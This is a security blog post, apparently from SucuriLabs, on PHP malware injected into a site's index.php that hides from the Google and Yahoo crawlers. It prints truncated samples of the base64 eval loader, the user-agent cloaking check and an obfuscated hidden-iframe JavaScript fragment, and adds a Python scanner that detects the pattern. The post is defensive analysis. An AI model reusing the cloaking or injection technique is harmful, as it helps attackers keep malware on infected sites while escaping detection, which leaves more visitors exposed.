Malware hiding from Google

Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or "hackers", as the media like to call them), and as a result they are already changing their tactics to hide from Google.

Why is this bad business for the malware writers? Well, if a site gets blacklisted, fewer users will visit it, so fewer people will load their malware and get infected. Good for everyone else, bad for them.

Anyway, yesterday we were analyzing a piece of malware that added the following code to the index.php of a site:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ?>

After decoding it, we got code that looked like this:

// Serve the payload only when the visitor is neither the Google nor the Yahoo crawler
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
    (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
{
    // the second base64 blob is the injected JavaScript shown below
    return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
}
else
{
    // crawlers get nothing, so the site looks clean to Google and Yahoo
    return "";
}

So basically the malware was checking whether the user agent belonged to the Google or Yahoo bot and, in that case, not returning the malware at all. Everyone else would get the malicious JavaScript:

var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split('*%@').join(""));

If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.
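As an added example (not code from the post or from Sucuri), here is a small Python scanner that pulls every eval(base64_decode("...")) payload out of a PHP file, decodes it, and reports which crawler names are compared against HTTP_USER_AGENT, which is exactly the cloaking check shown above. The sample index.php, the CLOAK_PHP snippet and the BOT_NAMES list are constructed for the demo.

```python
import base64
import re

# Constructed sample: a cloaking snippet in the shape of the one decoded above,
# re-encoded so SAMPLE_INDEX_PHP looks like the injected index.php.
CLOAK_PHP = (
    'if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&'
    '(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return base64_decode("'
    + base64.b64encode(b"<!-- constructed placeholder payload -->").decode()
    + '"); } else { return ""; }'
)
SAMPLE_INDEX_PHP = (
    '<?php /**/ eval(base64_decode("'
    + base64.b64encode(CLOAK_PHP.encode()).decode()
    + '")); ?>\n<?php echo "legitimate page"; ?>\n'
)

# eval(base64_decode("...")) with either quote style and optional whitespace
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']', re.I)
# the string literal compared against HTTP_USER_AGENT inside stristr()/strpos()
UA_CHECK = re.compile(
    r'HTTP_USER_AGENT["\']\s*\]\s*,\s*["\']([^"\']+)["\']', re.I)
# constructed list of crawler names worth flagging when they gate code paths
BOT_NAMES = {"googlebot", "yahoo", "slurp", "bingbot", "msnbot"}


def decode_evals(php_source):
    """Return the decoded payload of every eval(base64_decode("...")) found."""
    payloads = []
    for match in EVAL_B64.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            continue  # not valid base64; the eval is still worth a manual look
        payloads.append(raw.decode("utf-8", "replace"))
    return payloads


def bots_checked(payload):
    """Lowercased names compared against HTTP_USER_AGENT in a decoded payload."""
    return sorted({m.group(1).lower() for m in UA_CHECK.finditer(payload)})


def analyze(php_source):
    """One finding per decoded eval: which crawlers it cloaks from, nested base64."""
    findings = []
    for payload in decode_evals(php_source):
        findings.append({
            "cloaks_from": [b for b in bots_checked(payload) if b in BOT_NAMES],
            "nested_base64": bool(re.search(r"base64_decode", payload, re.I)),
        })
    return findings
```

A finding whose cloaks_from list is non-empty is the signature of this technique: decoded code that branches on the crawler's user agent is cloaking, whatever the inner payload turns out to be.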


About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://tonycode.com/ Tony

    There is another WordPress hack happening this week where the code only returns bogus information if the user agent is Google.

    http://blog.arpitnext.com/2010/04/wordpress-search-engine-cloak-hack.html

    Any chance you can get the sucuri monitoring service to make requests as googlebot in addition to a normal browser? Just make sure you don't diff the browser vs bot content as they are sometimes different intentionally, but still send alerts anytime there is a change for either user agent.

  • Anonymous

    "If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check" -> or maybe we have to begin to use their user agent to be ignored from malware :)

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    @anonymous: That would be a funny thing to do :) I wonder what the malware writers would do at that point.. lol